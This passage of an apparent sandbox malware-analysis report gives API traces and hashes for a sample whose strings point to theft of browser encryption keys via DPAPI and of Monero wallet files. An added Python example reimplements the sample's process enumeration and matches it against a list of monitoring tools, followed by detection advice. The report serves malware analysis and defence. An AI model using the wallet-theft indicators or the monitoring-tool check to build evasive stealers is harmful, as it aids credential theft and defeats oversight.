                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 9ed09f87fcfd9f66e0e5a20db72d38ee64eb38e9b39a88f2f1c87317c964ddfd
                            • Instruction ID: fc3686ce84564ed2aca6401f9405b400ac27e650a8627c8c39fcb1a0195820a1
                            • Opcode Fuzzy Hash: 9ed09f87fcfd9f66e0e5a20db72d38ee64eb38e9b39a88f2f1c87317c964ddfd
                            • Instruction Fuzzy Hash: 33311CB6D10209ABDF15DFE4DC85FEFB7B8AB48304F144519E905AB245EB30AA04CBA1
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
                            • Process32First.KERNEL32(?,00000128), ref: 003586DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003586F3
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • CloseHandle.KERNEL32(?), ref: 00358761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
                            • Instruction ID: 884bc5e85d8e1a08c01e7d8ef75084f831d6e7381baa8d3dce71939502e4f497
                            • Opcode Fuzzy Hash: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
                            • Instruction Fuzzy Hash: D0316D71901618ABDB26DF50DC41FEEB778FF49701F104299E90AB61A0EB306A49DFA1
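The function traced above is a Toolhelp32 process walk: CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS (the `00000002` first argument), Process32First and Process32Next against a PROCESSENTRY32 whose dwSize is `0x128` (the 296-byte ANSI layout of a 32-bit process), then CloseHandle. The Python below is an added example, not the sample's code, that performs the same walk through ctypes on Windows and separates it from the name matching it feeds, so the matching can be exercised on a constructed snapshot anywhere. The report does not show which process names the sample compares against or how it compares them; the watch list and the case-insensitive comparison are assumptions of this example.

```python
"""Toolhelp32 process enumeration as traced in the report, plus name matching.
Added example; not the sample's code. WATCH_LIST and the comparison are assumed.
"""
import ctypes
import sys
from typing import Iterable, Iterator, List, Tuple

TH32CS_SNAPPROCESS = 0x00000002        # first argument of CreateToolhelp32Snapshot in the trace
PROCESSENTRY32_ANSI_SIZE_X86 = 0x128   # dwSize seen in the Process32First/Next calls (32-bit ANSI struct)

# Constructed watch list: plausible monitoring-tool names. The exact strings the
# sample compares are not visible in the trace.
WATCH_LIST = ["taskmgr.exe", "procexp.exe", "procexp64.exe", "procmon.exe", "procmon64.exe"]


def snapshot_toolhelp32() -> Iterator[Tuple[int, str]]:
    """Yield (pid, exe name) exactly in the trace's order of calls:
    CreateToolhelp32Snapshot -> Process32First -> Process32Next loop -> CloseHandle.
    Windows only; raises OSError elsewhere."""
    if not sys.platform.startswith("win"):
        raise OSError("Toolhelp32 is a Windows-only API")
    from ctypes import wintypes

    class PROCESSENTRY32(ctypes.Structure):  # ANSI layout from tlhelp32.h
        _fields_ = [
            ("dwSize", wintypes.DWORD),
            ("cntUsage", wintypes.DWORD),
            ("th32ProcessID", wintypes.DWORD),
            ("th32DefaultHeapID", ctypes.c_size_t),   # ULONG_PTR: 4 bytes on x86, 8 on x64
            ("th32ModuleID", wintypes.DWORD),
            ("cntThreads", wintypes.DWORD),
            ("th32ParentProcessID", wintypes.DWORD),
            ("pcPriClassBase", wintypes.LONG),
            ("dwFlags", wintypes.DWORD),
            ("szExeFile", ctypes.c_char * 260),      # MAX_PATH
        ]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateToolhelp32Snapshot.restype = wintypes.HANDLE
    k32.Process32First.argtypes = [wintypes.HANDLE, ctypes.POINTER(PROCESSENTRY32)]
    k32.Process32Next.argtypes = [wintypes.HANDLE, ctypes.POINTER(PROCESSENTRY32)]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]

    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    if snap is None or snap == ctypes.c_void_p(-1).value:  # NULL or INVALID_HANDLE_VALUE
        raise OSError("CreateToolhelp32Snapshot failed, error %d" % ctypes.get_last_error())
    entry = PROCESSENTRY32()
    entry.dwSize = ctypes.sizeof(entry)  # 0x128 under 32-bit Python, 0x130 under 64-bit
    try:
        ok = k32.Process32First(snap, ctypes.byref(entry))
        while ok:
            yield int(entry.th32ProcessID), entry.szExeFile.decode("mbcs", "replace")
            ok = k32.Process32Next(snap, ctypes.byref(entry))
    finally:
        k32.CloseHandle(snap)


def find_watched(processes: Iterable[Tuple[int, str]],
                 watch_list: Iterable[str]) -> List[Tuple[int, str]]:
    """Return the (pid, name) pairs whose exe name is on the watch list.

    Case-insensitive exact match on the file name; an assumption, since the
    trace shows the walk but not the comparison.
    """
    wanted = {name.lower() for name in watch_list}
    return [(pid, name) for pid, name in processes if name.lower() in wanted]


if __name__ == "__main__":
    try:
        hits = find_watched(snapshot_toolhelp32(), WATCH_LIST)
    except OSError as exc:
        print("skipped live walk:", exc)
    else:
        print("watched processes running:", hits)
```

For detection purposes note that a Toolhelp32 snapshot is a user-mode read with no audit event of its own; what is observable is the subsequent behaviour (the sample exiting, sleeping, or opening a handle to the matched process), so EDR rules key on OpenProcess and process-termination telemetry rather than on the snapshot.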
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E00,00000000,?), ref: 003579B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003579B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00360E00,00000000,?), ref: 003579C4
                            • wsprintfA.USER32 ref: 003579F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
                            • Instruction ID: 3df4b24ac7bbc0598e9bcf968ddbcc3ecd79ec0b5dc047dc183055b798ac7785
                            • Opcode Fuzzy Hash: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
                            • Instruction Fuzzy Hash: A11118B2904118AADB149FCADD45BBEB7F8EB48B11F10411AFA05A2290E2395944DBB1
                            APIs
                            • __getptd.LIBCMT ref: 0035C74E
                              • Part of subcall function 0035BF9F: __amsg_exit.LIBCMT ref: 0035BFAF
                            • __getptd.LIBCMT ref: 0035C765
                            • __amsg_exit.LIBCMT ref: 0035C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0035C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
                            • Instruction ID: fe44353c6f4c49be72c6f3e362feee5a37b723ee2b247108d91eaccfb143dfa3
                            • Opcode Fuzzy Hash: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
                            • Instruction Fuzzy Hash: 4BF09032910B109FD723BBB89C06F49B3A06F0472BF255149FC14AE5F2CB6459889E96
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354F7A
                            • lstrcat.KERNEL32(?,00361070), ref: 00354F97
                            • lstrcat.KERNEL32(?,00FB9788), ref: 00354FAB
                            • lstrcat.KERNEL32(?,00361074), ref: 00354FBD
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
                              • Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                              • Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                              • Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 96a3196a79951ab889d2cb8bbeafa04cb7972da6c5a4b64911d10c939dd2942f
                            • Instruction ID: 5491a15656770b4064f3ee6a58cc519c49a4abe77bcf677c13552b5533449186
                            • Opcode Fuzzy Hash: 96a3196a79951ab889d2cb8bbeafa04cb7972da6c5a4b64911d10c939dd2942f
                            • Instruction Fuzzy Hash: 5121DD7690020467DB55FBB0DC46EED337CAB54300F004545BA49AA195EE7496CD9FA2